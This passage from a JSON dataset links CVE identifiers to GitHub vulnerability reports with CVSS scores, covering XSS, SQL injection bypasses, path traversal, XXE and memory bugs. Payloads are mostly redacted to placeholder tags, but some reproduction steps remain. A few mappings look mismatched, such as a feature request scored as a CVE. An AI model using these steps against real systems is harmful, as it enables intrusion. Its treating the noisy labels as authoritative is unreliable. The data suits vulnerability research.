  42623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42624. "severity": "CRITICAL",
  42625. "baseScore": 9.8,
  42626. "impactScore": 5.9,
  42627. "exploitabilityScore": 3.9
  42628. },
  42629. {
  42630. "CVE_ID": "CVE-2019-25043",
  42631. "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/2566",
  42632. "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/2566",
  42633. "Repo_new": "spiderlabs/modsecurity",
  42634. "Issue_Created_At": "2021-05-06T03:01:20Z",
  42635. "description": "Certain HTTP request cause APITAG to throw \"string out of index\" error. Describe the bug The connection will be closed due to a \"string index out of range\" error under certain request. Logs and dumps CODETAG To Reproduce APITAG Server: APITAG NUMBERTAG on Ngin NUMBERTAG official base image",
  42636. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  42637. "severity": "MEDIUM",
  42638. "baseScore": 5.3,
  42639. "impactScore": 1.4,
  42640. "exploitabilityScore": 3.9
  42641. },
  42642. {
  42643. "CVE_ID": "CVE-2019-25047",
  42644. "Issue_Url_old": "https://github.com/greenbone/gsa/issues/1601",
  42645. "Issue_Url_new": "https://github.com/greenbone/gsa/issues/1601",
  42646. "Repo_new": "greenbone/gsa",
  42647. "Issue_Created_At": "2019-09-02T13:48:06Z",
  42648. "description": "Reflected XSS in GSA possible.. Expected behavior Escaping part of URL and redirecting to /login page. Actual behavior When clicking on a specially crafted URL, APITAG Code gets executed. Steps to reproduce FILETAG GVM versions gsa NUMBERTAG gvm NUMBERTAG openvas scanner NUMBERTAG gvm libs: Environment Operating system: found with nikto NUMBERTAG erified with Firefox Quantum NUMBERTAG esr NUMBERTAG Bit) Installation method / source: (packages, source installation) Logfiles APITAG APITAG",
  42649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42650. "severity": "MEDIUM",
  42651. "baseScore": 6.1,
  42652. "impactScore": 2.7,
  42653. "exploitabilityScore": 2.8
  42654. },
  42655. {
  42656. "CVE_ID": "CVE-2019-25056",
  42657. "Issue_Url_old": "https://github.com/bromite/bromite/issues/2",
  42658. "Issue_Url_new": "https://github.com/bromite/bromite/issues/2",
  42659. "Repo_new": "bromite/bromite",
  42660. "Issue_Created_At": "2017-10-11T14:19:01Z",
  42661. "description": "Support download of filters from adblock servers. This issue composes of multiple parts: a new tab to manage the adblocking feature logic to download the adblock filters and store them logic to parse the adblock filters The project we could look at are APITAG and APITAG origin.",
  42662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  42663. "severity": "MEDIUM",
  42664. "baseScore": 5.3,
  42665. "impactScore": 1.4,
  42666. "exploitabilityScore": 3.9
  42667. },
  42668. {
  42669. "CVE_ID": "CVE-2019-25058",
  42670. "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/273",
  42671. "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/273",
  42672. "Repo_new": "usbguard/usbguard",
  42673. "Issue_Created_At": "2019-02-07T12:11:36Z",
  42674. "description": "No default ACL on some dbus methods. Some of the methods exposed via dbus are not covered by the current default policy URLTAG . This includes the APITAG and APITAG methods. On a default debian install, as unprivileged user: ERRORTAG This can be fixed by adding these to the current policy configuration. However, having NUMBERTAG buses and NUMBERTAG ACLs makes the administration of any deployment tedious. There is always a risk of future methods to be exposed. Ideally, dbus should be the only bus exposed and the libqb bus dropped.",
  42675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42676. "severity": "HIGH",
  42677. "baseScore": 7.8,
  42678. "impactScore": 5.9,
  42679. "exploitabilityScore": 1.8
  42680. },
  42681. {
  42682. "CVE_ID": "CVE-2019-25058",
  42683. "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/403",
  42684. "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/403",
  42685. "Repo_new": "usbguard/usbguard",
  42686. "Issue_Created_At": "2020-08-07T17:54:42Z",
  42687. "description": "Polkit policy is not valid with newest versions of Polkit. With new versions of Polkit, the value APITAG is no more valid for the tags APITAG , APITAG and APITAG . The [usbguard policy config]( URLTAG is not parsed anymore by new versions of Polkit, and the defined actions are unavailable. proposed solutions APITAG : allowed executing an action after authenticating, and the redo the action without auth for all the rest of the session. It is now unavailable APITAG : the authorization is kept for a brief period (e.g. five minutes). It is most probably not retro compatible. (I found no reference online of APITAG on pages mentioning APITAG ) APITAG : You have to re authenticate at each call of the action. This argument is retro compatible. Should we replace occurrences of APITAG with APITAG or APITAG ?",
  42688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42689. "severity": "HIGH",
  42690. "baseScore": 7.8,
  42691. "impactScore": 5.9,
  42692. "exploitabilityScore": 1.8
  42693. },
  42694. {
  42695. "CVE_ID": "CVE-2019-25070",
  42696. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/683",
  42697. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/683",
  42698. "Repo_new": "wolfcms/wolfcms",
  42699. "Issue_Created_At": "2019-04-01T06:25:24Z",
  42700. "description": "Cross Site Scripting | APITAG NUMBERTAG User Add. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add an user NUMBERTAG Insert payload (malicious APITAG APITAG in Name text box and an invalid input in Username text box. APITAG NUMBERTAG Application is displaying error APITAG and returning the previous APITAG payload in response and hence executing it. APITAG Best Regards, URLTAG varchashva [at] gmail [dot] com",
  42701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42702. "severity": "MEDIUM",
  42703. "baseScore": 6.1,
  42704. "impactScore": 2.7,
  42705. "exploitabilityScore": 2.8
  42706. },
  42707. {
  42708. "CVE_ID": "CVE-2019-3494",
  42709. "Issue_Url_old": "https://github.com/Paroxyste/Simply-Blog/issues/1",
  42710. "Issue_Url_new": "https://github.com/paroxyste/simply-blog/issues/1",
  42711. "Repo_new": "Paroxyste/Simply-Blog",
  42712. "Issue_Created_At": "2019-01-01T09:12:59Z",
  42713. "description": "There might be a SQL inject issus in FILETAG . issus start at line NUMBERTAG to line NUMBERTAG CODETAG We can see intuitively that database queries are not filtered\uff0cso attacker can inject payload into Query directly SUGGEST: i think you can add character filtering to check user input before execute the query",
  42714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42715. "severity": "HIGH",
  42716. "baseScore": 7.5,
  42717. "impactScore": 3.6,
  42718. "exploitabilityScore": 3.9
  42719. },
  42720. {
  42721. "CVE_ID": "CVE-2019-3500",
  42722. "Issue_Url_old": "https://github.com/aria2/aria2/issues/1329",
  42723. "Issue_Url_new": "https://github.com/aria2/aria2/issues/1329",
  42724. "Repo_new": "aria2/aria2",
  42725. "Issue_Created_At": "2019-01-01T12:52:33Z",
  42726. "description": "Metadata and potential password leaks via log=. Hi Team, I am using aria2 version NUMBERTAG on NUMBERTAG generic NUMBERTAG Ubuntu NUMBERTAG It was observed that URL's which gets downloaded via APITAG attribute stored sensitive information NUMBERTAG In combination with HTTP authentication a username and password can be part of the URL. APITAG In such case the log file contains password as well, sometimes URL's may contain secret tokens, e.g. private file shares on a file hosting service. In general storing metadata at unexpected places should be avoided NUMBERTAG However, if the above steps are repeated using the below URL the log file does not contains password. APITAG Request team to have a look and validate.",
  42727. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42728. "severity": "HIGH",
  42729. "baseScore": 7.8,
  42730. "impactScore": 5.9,
  42731. "exploitabilityScore": 1.8
  42732. },
  42733. {
  42734. "CVE_ID": "CVE-2019-3501",
  42735. "Issue_Url_old": "https://github.com/Sama34/OUGC-Awards/issues/29",
  42736. "Issue_Url_new": "https://github.com/sama34/ougc-awards/issues/29",
  42737. "Repo_new": "sama34/ougc-awards",
  42738. "Issue_Created_At": "2019-01-02T05:47:24Z",
  42739. "description": "XSS in reason field.. Describe the bug Apparently custom reasons are not sanitized on output. To Reproduce Steps to reproduce the behavior NUMBERTAG Have a mod account level or higher NUMBERTAG Go to Manage Awards in APITAG NUMBERTAG Give an award to a user and input payload for reason. APITAG NUMBERTAG Payload executes when viewing award on FILETAG and user profiles. Expected behavior Such code shouldn't be executed.",
  42740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42741. "severity": "MEDIUM",
  42742. "baseScore": 4.8,
  42743. "impactScore": 2.7,
  42744. "exploitabilityScore": 1.7
  42745. },
  42746. {
  42747. "CVE_ID": "CVE-2019-3572",
  42748. "Issue_Url_old": "https://github.com/libming/libming/issues/169",
  42749. "Issue_Url_new": "https://github.com/libming/libming/issues/169",
  42750. "Repo_new": "libming/libming",
  42751. "Issue_Created_At": "2018-12-28T10:35:44Z",
  42752. "description": "a heap buffer overflow problem in function APITAG in file PATHTAG I found a a heap buffer overflow problem in function APITAG in file PATHTAG FILETAG PATHTAG verbose in2.dbl FILETAG image data RGB outsize NUMBERTAG size NUMBERTAG unpacked data size t NUMBERTAG byte channel count NUMBERTAG Segmentation fault (core dumped) ERRORTAG",
  42753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42754. "severity": "MEDIUM",
  42755. "baseScore": 6.5,
  42756. "impactScore": 3.6,
  42757. "exploitabilityScore": 2.8
  42758. },
  42759. {
  42760. "CVE_ID": "CVE-2019-3573",
  42761. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/83",
  42762. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/83",
  42763. "Repo_new": "saitoha/libsixel",
  42764. "Issue_Created_At": "2019-01-02T08:08:21Z",
  42765. "description": "two bugs in img2sixel and sixel2png. APITAG CODETAG APITAG ERRORTAG",
  42766. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42767. "severity": "MEDIUM",
  42768. "baseScore": 5.5,
  42769. "impactScore": 3.6,
  42770. "exploitabilityScore": 1.8
  42771. },
  42772. {
  42773. "CVE_ID": "CVE-2019-3575",
  42774. "Issue_Url_old": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
  42775. "Issue_Url_new": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
  42776. "Repo_new": "schettino72/sqla_yaml_fixtures",
  42777. "Issue_Created_At": "2019-01-02T15:02:16Z",
  42778. "description": "APITAG method is vulnerable. import sqla_yaml_fixtures test_str PATHTAG [\"dir\"]' APITAG",
  42779. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42780. "severity": "HIGH",
  42781. "baseScore": 7.8,
  42782. "impactScore": 5.9,
  42783. "exploitabilityScore": 1.8
  42784. },
  42785. {
  42786. "CVE_ID": "CVE-2019-3577",
  42787. "Issue_Url_old": "https://github.com/caokang/waimai/issues/9",
  42788. "Issue_Url_new": "https://github.com/caokang/waimai/issues/9",
  42789. "Repo_new": "caokang/waimai",
  42790. "Issue_Created_At": "2019-01-02T16:02:56Z",
  42791. "description": "There is a SQL Injection vulnerability. There is a blind sql injection. APITAG is based on APITAG vulnerable code in PATHTAG ERRORTAG exp to get admin password here: CODETAG",
  42792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42793. "severity": "CRITICAL",
  42794. "baseScore": 9.8,
  42795. "impactScore": 5.9,
  42796. "exploitabilityScore": 3.9
  42797. },
  42798. {
  42799. "CVE_ID": "CVE-2019-3580",
  42800. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1927",
  42801. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1927",
  42802. "Repo_new": "openrefine/openrefine",
  42803. "Issue_Created_At": "2019-01-02T17:44:47Z",
  42804. "description": "Project import vulnerable to arbitrary file write. Describe the bug The import of a project is prone to a path traversal and thus an arbitrary file write. To Reproduce Steps to reproduce the behavior NUMBERTAG Download FILETAG NUMBERTAG APITAG , APITAG is greated NUMBERTAG Go to APITAG Import Projects NUMBERTAG Choose APITAG NUMBERTAG Import file NUMBERTAG APITAG should show the content of the file. Current Results The first NUMBERTAG bytes are from the file APITAG are chosen as path, not the filename itself. An error is also shown but is not related to the path traversal. Expected behavior Show an error, warn user, do not write file outside of the project folder. Video FILETAG Desktop (please complete the following information): Not important APITAG (please complete the following information): Demo with NUMBERTAG but should work with master Datasets Payload file FILETAG Additional context Please also update dependencies. The ant library is out of date and sloppy (compared to other) handling (tar) archive header. If you have questions, you can reach me at \"niko at sign shiftleft.io\" or URLTAG",
  42805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42806. "severity": "HIGH",
  42807. "baseScore": 7.5,
  42808. "impactScore": 3.6,
  42809. "exploitabilityScore": 3.9
  42810. },
  42811. {
  42812. "CVE_ID": "CVE-2019-3817",
  42813. "Issue_Url_old": "https://github.com/rpm-software-management/libcomps/issues/41",
  42814. "Issue_Url_new": "https://github.com/rpm-software-management/libcomps/issues/41",
  42815. "Repo_new": "rpm-software-management/libcomps",
  42816. "Issue_Created_At": "2019-01-21T16:12:03Z",
  42817. "description": "use after free in comps_objmrtree_unite function. pair is freed in URLTAG but it is accessed again at the next iteration at URLTAG accessing memory that was just recently freed. Valgrind output: ERRORTAG",
  42818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42819. "severity": "HIGH",
  42820. "baseScore": 8.8,
  42821. "impactScore": 5.9,
  42822. "exploitabilityScore": 2.8
  42823. },
  42824. {
  42825. "CVE_ID": "CVE-2019-3832",
  42826. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/456",
  42827. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/456",
  42828. "Repo_new": "libsndfile/libsndfile",
  42829. "Issue_Created_At": "2019-02-07T09:17:20Z",
  42830. "description": "Incomplete fix for CVETAG . Hi, I think the fix for CVETAG in URLTAG is not complete and it is still possible to trigger the same flaw just by adjusting the APITAG a bit. In APITAG : APITAG Loops is defined as an array of NUMBERTAG elements, so reducing APITAG to a NUMBERTAG bit number does not really solve the out of bound read issue. The value should be checked and wrapped to NUMBERTAG not NUMBERTAG bits) or the process terminated immediately because the input is malformed. How to reproduce ERRORTAG FILETAG Extra If the issue is confirmed, I will request a new CVE for it as the old one may have been already fixed in some distributions, which would not get the real fix otherwise.",
  42831. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42832. "severity": "MEDIUM",
  42833. "baseScore": 5.5,
  42834. "impactScore": 3.6,
  42835. "exploitabilityScore": 1.8
  42836. },
  42837. {
  42838. "CVE_ID": "CVE-2019-3841",
  42839. "Issue_Url_old": "https://github.com/kubevirt/containerized-data-importer/issues/678",
  42840. "Issue_Url_new": "https://github.com/kubevirt/containerized-data-importer/issues/678",
  42841. "Repo_new": "kubevirt/containerized-data-importer",
  42842. "Issue_Created_At": "2019-02-26T21:32:36Z",
  42843. "description": "Registry imports disable TLS. A flaw was identified in the Containerized Data Importer, a component used by Container Native Virtualization. In Containerized Data Importer versions from NUMBERTAG through NUMBERTAG the import from registry feature disabled TLS certificate verification when communicating with container registries. An attacker could use this flaw to impersonate a trusted container registry. All users should upgrade to CDI version NUMBERTAG or later. Affected Components CDI importer container image (kubevirt/cdi importer) Affected Versions CDI NUMBERTAG CDI NUMBERTAG Users of Red Hat Container Native Virtualization are unaffected. Vulnerability Impact Unless explicitly disabled, communication with container registries is expected to be secured with SSL and TLS. In CDI versions affected by this flaw, TLS certificate verification is disabled for all connections to container registries. As a result, content may be imported into a PVC from an inauthentic server. Mitigations The vulnerability can only be triggered by an authenticated kubernetes user who is authorized to create PVCs. To mitigate, do not create PVCs with the APITAG \"registry\"\" annotation and do not create APITAG that use the \"registry\" source. Detection To identify if your CDI deployment is affected perform the following steps: Initiate an import from registry using either a APITAG or a PVC without requesting an insecure connection Locate the importer pod in the namespace where the PVC or APITAG was created Look for a message similar to the following in the logs: APITAG The presence of the parameter APITAG indicates a vulnerable CDI deployment",
  42844. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
  42845. "severity": "MEDIUM",
  42846. "baseScore": 6.8,
  42847. "impactScore": 5.2,
  42848. "exploitabilityScore": 1.6
  42849. },
  42850. {
  42851. "CVE_ID": "CVE-2019-5064",
  42852. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15857",
  42853. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15857",
  42854. "Repo_new": "opencv/opencv",
  42855. "Issue_Created_At": "2019-11-06T16:00:12Z",
  42856. "description": "Talos security advisory for Opencv (TALOS NUMBERTAG The Cisco Talos team found two security vulnerabilities affecting Opencv APITAG NUMBERTAG As this is a sensitive security issue, this message is to request a point of contact to report the detailed report. Email requests to admin at opencv.org were also sent.",
  42857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42858. "severity": "HIGH",
  42859. "baseScore": 8.8,
  42860. "impactScore": 5.9,
  42861. "exploitabilityScore": 2.8
  42862. },
  42863. {
  42864. "CVE_ID": "CVE-2019-5310",
  42865. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/6",
  42866. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/6",
  42867. "Repo_new": "doublefast/yunucms",
  42868. "Issue_Created_At": "2019-01-04T06:48:58Z",
  42869. "description": "Bug NUMBERTAG Stored Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG The judgment code of the basic settings page is: FILETAG Pass in such a packet here FILETAG See the FILETAG file to see that the site_title parameter has been changed. FILETAG The value in FILETAG was taken directly in FILETAG , resulting in a storage XSS vulnerability. FILETAG APITAG To Reproduce: FILETAG FILETAG FILETAG Fix: Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc.",
  42870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42871. "severity": "MEDIUM",
  42872. "baseScore": 6.1,
  42873. "impactScore": 2.7,
  42874. "exploitabilityScore": 2.8
  42875. },
  42876. {
  42877. "CVE_ID": "CVE-2019-5311",
  42878. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/5",
  42879. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/5",
  42880. "Repo_new": "doublefast/yunucms",
  42881. "Issue_Created_At": "2019-01-04T03:42:16Z",
  42882. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG NUMBERTAG In the PATHTAG , No filtering to cw in the index( ) function: FILETAG FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the id parameter",
  42883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42884. "severity": "MEDIUM",
  42885. "baseScore": 6.1,
  42886. "impactScore": 2.7,
  42887. "exploitabilityScore": 2.8
  42888. },
  42889. {
  42890. "CVE_ID": "CVE-2019-5312",
  42891. "Issue_Url_old": "https://github.com/Wechat-Group/WxJava/issues/903",
  42892. "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/903",
  42893. "Repo_new": "wechat-group/wxjava",
  42894. "Issue_Created_At": "2019-01-04T14:04:31Z",
  42895. "description": "XXE Vulnerability. Hello, i have tested the fix for the XXE vulnerability of the issue NUMBERTAG URLTAG . Unfortunately, the vulnerability is still present in version APITAG , see the image below. FILETAG Additional information on how to prevent such kind of issues can be found on URLTAG Thank you and best regards",
  42896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42897. "severity": "CRITICAL",
  42898. "baseScore": 9.8,
  42899. "impactScore": 5.9,
  42900. "exploitabilityScore": 3.9
  42901. },
  42902. {
  42903. "CVE_ID": "CVE-2019-5421",
  42904. "Issue_Url_old": "https://github.com/plataformatec/devise/issues/4981",
  42905. "Issue_Url_new": "https://github.com/heartcombo/devise/issues/4981",
  42906. "Repo_new": "heartcombo/devise",
  42907. "Issue_Created_At": "2018-11-27T16:02:36Z",
  42908. "description": "Small security issue with :lockable. Environment Ruby any Rails any running a multithreaded server (like puma) Devise NUMBERTAG Current behavior Some pentesters found an issue where our users did not lock (using :lockable), despite running many many attempts to brute force the password. To reproduce, try to login many times at exactly the same time NUMBERTAG attempts within NUMBERTAG milliseconds of each other will not increment the failed_attempts attribute on your user NUMBERTAG times on a busy or slow database. This is a test that describes the behaviour that I would reasonably expect: CODETAG This test will fail in devise NUMBERTAG Expected behavior The issue arises because we read and set failed_attempts in two steps, instead of in one transaction. Below is an excerpt of the method from APITAG , my comments added: ERRORTAG Our workaround we use is something along the lines of: CODETAG which passes the test above. This solution is postgres specific (and also assumes integer ids) so may not be suitable for devise, but the idea stands. Reading and writing from this attribute needs to happen on at least a row level transaction in the database.",
  42909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42910. "severity": "CRITICAL",
  42911. "baseScore": 9.8,
  42912. "impactScore": 5.9,
  42913. "exploitabilityScore": 3.9
  42914. },
  42915. {
  42916. "CVE_ID": "CVE-2019-5477",
  42917. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1915",
  42918. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1915",
  42919. "Repo_new": "sparklemotion/nokogiri",
  42920. "Issue_Created_At": "2019-07-20T19:40:01Z",
  42921. "description": "placeholder] embargoed security vulnerability. A security vulnerability has been reported via the APITAG Reporting Policy process URLTAG and this issue will be the public record for this vulnerability and the triage and mitigation process.",
  42922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42923. "severity": "CRITICAL",
  42924. "baseScore": 9.8,
  42925. "impactScore": 5.9,
  42926. "exploitabilityScore": 3.9
  42927. },
  42928. {
  42929. "CVE_ID": "CVE-2019-5720",
  42930. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/38",
  42931. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/38",
  42932. "Repo_new": "frontaccountingerp/fa",
  42933. "Issue_Created_At": "2019-01-07T11:10:06Z",
  42934. "description": "SQL Injection. > APITAG is my first time to chat with people in English. I don't speak much English. Frontaccounting is using function APITAG to escape value. But some variables do not use the function APITAG environment : docker mattrayner/lamp:latest NUMBERTAG Description PATHTAG If I set parameter $reference like \u2018XXXXXX\\\u2019. Single quotes can APITAG I can inject in parameter $type FILETAG APITAG FILETAG PATHTAG FILETAG APITAG FILETAG APITAG FILETAG So parameter $type can be controlled How about parameter $reference? FILETAG FILETAG APITAG FILETAG After that I found some insert statements of table grn_batch. PATHTAG FILETAG PATHTAG FILETAG purchasing/ FILETAG NUMBERTAG FILETAG FILETAG So parameter $reference can be controlled NUMBERTAG Bypass NUMBERTAG PHP switch ($type) The variable $type like NUMBERTAG in here is same as NUMBERTAG dasdsadasda. FILETAG FILETAG NUMBERTAG Mysql Converting a string into an integer has some problems in mysql. FILETAG NUMBERTAG dasdasdasd NUMBERTAG dasdasdasd' FILETAG String and integer can be added NUMBERTAG Mysql has SQL Truncation problem so that \u2018\\\u2019 can be truncated NUMBERTAG POC: Settings such as PATHTAG will report an error, but PATHTAG will not . I noticed that refererence is NUMBERTAG bytes, set the payload to NUMBERTAG bytes like PATHTAG is PATHTAG in the database. I am using FILETAG , not the po_receive_items.php found above. FILETAG CODETAG database: FILETAG FILETAG FILETAG CODETAG The final execution of the sql statement is like this\uff1a ERRORTAG",
  42935. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42936. "severity": "CRITICAL",
  42937. "baseScore": 9.8,
  42938. "impactScore": 5.9,
  42939. "exploitabilityScore": 3.9
  42940. },
  42941. {
  42942. "CVE_ID": "CVE-2019-5886",
  42943. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/1",
  42944. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/1",
  42945. "Repo_new": "gongfuxiang/shopxo",
  42946. "Issue_Created_At": "2019-01-04T08:31:44Z",
  42947. "description": "\u91cd\u88c5\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG PATHTAG FILETAG \u6784\u9020\u5982\u4e0bpost\u8bf7\u6c42 FILETAG APITAG FILETAG \u6700\u5173\u952e\u7684\u5730\u65b9\u662f\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e5f\u4fee\u6539\u4e86 FILETAG APITAG",
  42948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42949. "severity": "CRITICAL",
  42950. "baseScore": 9.8,
  42951. "impactScore": 5.9,
  42952. "exploitabilityScore": 3.9
  42953. },
  42954. {
  42955. "CVE_ID": "CVE-2019-5887",
  42956. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/2",
  42957. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/2",
  42958. "Repo_new": "gongfuxiang/shopxo",
  42959. "Issue_Created_At": "2019-01-04T09:55:55Z",
  42960. "description": "\u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664\u6f0f\u6d1e. APITAG APITAG FILETAG \u8fdb\u5165delete\u65b9\u6cd5\u4e2d\uff0c\u5f53\u4e0d\u662fzip\u7ed3\u5c3e\u65f6\u4f1a\u8ba4\u4e3a\u662f\u6587\u4ef6\u5939 FILETAG APITAG FILETAG \u65b9\u6cd5\u4e2d\u53ea\u5bf9\u662f\u4e0d\u662f\u6587\u4ef6\u5939\u505a\u4e86\u6821\u9a8c\uff0c\u6700\u540e\u8fdb\u5165\u4e86rmdir\u65b9\u6cd5\u4e2d \u70b9\u51fb\u5220\u9664 FILETAG \u6293\u5305\u4fee\u6539 FILETAG \u6210\u529f\u5220\u9664 FILETAG",
  42961. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42962. "severity": "HIGH",
  42963. "baseScore": 7.5,
  42964. "impactScore": 3.6,
  42965. "exploitabilityScore": 3.9
  42966. },
  42967. {
  42968. "CVE_ID": "CVE-2019-6132",
  42969. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/357",
  42970. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/357",
  42971. "Repo_new": "axiomatic-systems/bento4",
  42972. "Issue_Created_At": "2019-01-10T17:00:31Z",
  42973. "description": "memory leaks in APITAG there is memory leaks in APITAG ./mp NUMBERTAG aac poc /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG a5 in APITAG APITAG &) PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG e NUMBERTAG cb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ddaa0 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG d6aa5 in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG d in APITAG APITAG PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0 in operator new FILETAG",
  42974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42975. "severity": "HIGH",
  42976. "baseScore": 7.5,
  42977. "impactScore": 3.6,
  42978. "exploitabilityScore": 3.9
  42979. },
  42980. {
  42981. "CVE_ID": "CVE-2019-6135",
  42982. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/104",
  42983. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/104",
  42984. "Repo_new": "mz-automation/libiec61850",
  42985. "Issue_Created_At": "2019-01-11T12:32:48Z",
  42986. "description": "Memeory leak in goose_publisher_example.c. Hi team, Their are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
  42987. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42988. "severity": "HIGH",
  42989. "baseScore": 7.5,
  42990. "impactScore": 3.6,
  42991. "exploitabilityScore": 3.9
  42992. },
  42993. {
  42994. "CVE_ID": "CVE-2019-6135",
  42995. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/103",
  42996. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/103",
  42997. "Repo_new": "mz-automation/libiec61850",
  42998. "Issue_Created_At": "2019-01-11T10:26:24Z",
  42999. "description": "Memory leaks in mms_mapping.c & mms_value.c. Hi team, Their are multiple memory leaks in APITAG and APITAG Snip FILETAG ERRORTAG Snip FILETAG ERRORTAG Memory leaks ERRORTAG",
